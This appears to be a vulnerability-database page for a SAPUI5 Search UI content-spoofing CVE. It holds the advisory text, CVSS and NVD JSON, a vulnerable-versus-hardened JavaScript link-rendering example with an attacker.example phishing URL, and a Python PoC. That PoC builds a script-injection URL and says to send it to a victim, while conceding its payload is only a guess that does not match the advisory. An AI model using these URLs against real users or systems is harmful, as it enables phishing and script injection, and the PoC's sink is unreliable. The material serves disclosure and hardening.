Security Vulnerability Report
CVE-2026-34258 CVSS 4.7 MEDIUM


Published: 2026-05-12 03:16:11
Last Modified: 2026-05-12 03:16:11

Description

SAPUI5 (Search UI) allows an unauthenticated attacker to manipulate specific URL parameters on the Search UI to include malicious content. Successful exploitation may mislead victim users into clicking and accessing attacker-controlled pages rendered by the application. This vulnerability has a low impact on confidentiality with no effect on the integrity and availability of the application.
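The weakness class described here (CWE-451: a URL parameter that the application renders as a link or navigation target the victim trusts) is easiest to see as a vulnerable sink beside its hardened form. The following is an added example in plain JavaScript, not SAP's code and not taken from the advisory or SAP Note 3726583. The application origin, the parameter names `target` and `q`, and the attacker link are all constructed for the demonstration, because the advisory does not name the affected parameter.

```javascript
// Added example (not SAP's code, not from the advisory). The advisory does not
// name the affected URL parameter; "target" and "q" below are hypothetical.
const APP_ORIGIN = "https://sap.example"; // constructed: origin the UI is served from

// Minimal HTML escaping for text placed into markup or attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable pattern: URL-derived parameters are rendered as a link and its
// label without validation, so whoever crafts the query string decides both
// where the victim is sent and what the page tells them about it.
function renderResultLinkVulnerable(pageUrl) {
  const params = new URL(pageUrl).searchParams;
  const target = params.get("target") || "";
  const label = params.get("q") || "";
  return `<a href="${target}">${label}</a>`;
}

// Hardened pattern: resolve the candidate against the application origin and
// accept it only if it stays on that origin. Resolving first (rather than
// regex-checking the raw string) means "//evil", "/\evil", "javascript:" and
// "data:" are all rejected, because none of them resolve to APP_ORIGIN.
function safeTarget(candidate) {
  let resolved;
  try {
    resolved = new URL(candidate, APP_ORIGIN);
  } catch {
    return null; // unparseable input is not a navigation target
  }
  if (resolved.origin !== APP_ORIGIN) return null; // scheme, host and port must match
  return resolved.pathname + resolved.search + resolved.hash; // re-emit as a relative path
}

function renderResultLinkHardened(pageUrl) {
  const params = new URL(pageUrl).searchParams;
  const target = safeTarget(params.get("target") || "/") || "/";
  const label = params.get("q") || "";
  return `<a href="${escapeHtml(target)}">${escapeHtml(label)}</a>`;
}

// Constructed attacker link: a plausible label, but the target is an attacker host.
const ATTACK_URL =
  APP_ORIGIN + "/search?q=Open+your+payslip&target=https://attacker.example/login";

function demo() {
  return {
    vulnerable: renderResultLinkVulnerable(ATTACK_URL),
    hardened: renderResultLinkHardened(ATTACK_URL),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const out = demo();
  console.log("vulnerable:", out.vulnerable);
  console.log("hardened:  ", out.hardened);
}
```

Run with `node`: the vulnerable renderer emits a link to attacker.example carrying the attacker-chosen label, the hardened renderer falls back to `/` and escapes the label. In a real UI5 application the same two checks would normally be done with the framework's own `sap/base/security/URLListValidator` and `sap/base/security/encodeXML` helpers rather than hand-rolled functions; the point is that the decision is made on the resolved URL and that a rejected value gets a safe default instead of being rendered anyway.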

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAPUI5 (Search UI) (for the affected versions, refer to SAP Security Patch Day and SAP Note 3726583)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a conceptual URL builder rather than a verified exploit: the advisory names neither the affected parameter nor a script-execution sink (the weakness is CWE-451 and the CVSS vector records no integrity impact), so the endpoint, parameter name and payload below are illustrative.
python
# PoC concept for CVE-2026-34258
# This script demonstrates how a malicious URL could be generated.
# Note: the advisory classifies the issue as CWE-451 (content spoofing) with no
# integrity impact; the script payload below is this PoC's guess at a sink, not
# a confirmed one. The endpoint and parameter name are hypothetical.
import urllib.parse


def generate_malicious_url(base_url, vulnerable_param, payload):
    """Generates a malicious URL exploiting the parameter manipulation."""
    params = {vulnerable_param: payload}
    query_string = urllib.parse.urlencode(params)
    return f"{base_url}?{query_string}"


if __name__ == "__main__":
    # Example target endpoint (hypothetical, based on SAPUI5 Search UI behavior)
    target = "https://victim-sap-system.com/sap/bc/ui5_ui5/sap/zsearch_ui/index.html"
    # The vulnerable parameter might be related to search query or navigation
    # Payload attempts to inject a script to display an alert or steal cookies
    malicious_payload = "\"><script>alert('CVE-2026-34258 Exploited')</script><!--"
    exploit_url = generate_malicious_url(target, "searchTerm", malicious_payload)
    print("[+] Potential Exploit URL Generated:")
    print(exploit_url)
    print("\n[!] Send this link to a victim. If they click and the page renders, the script executes.")

References

https://me.sap.com/notes/3726583 (SAP Note 3726583)
https://url.sap/sapsecuritypatchday (SAP Security Patch Day)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34258",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T03:16:11.247",
    "lastModified": "2026-05-12T03:16:11.247",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SAPUI5 (Search UI) allows an unauthenticated attacker to manipulate specific URL parameters on the Search UI to include malicious content. Successful exploitation may mislead victim users into clicking and accessing attacker-controlled pages rendered by the application. This vulnerability has a low impact on confidentiality with no effect on the integrity and availability of the application."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-451"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3726583",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}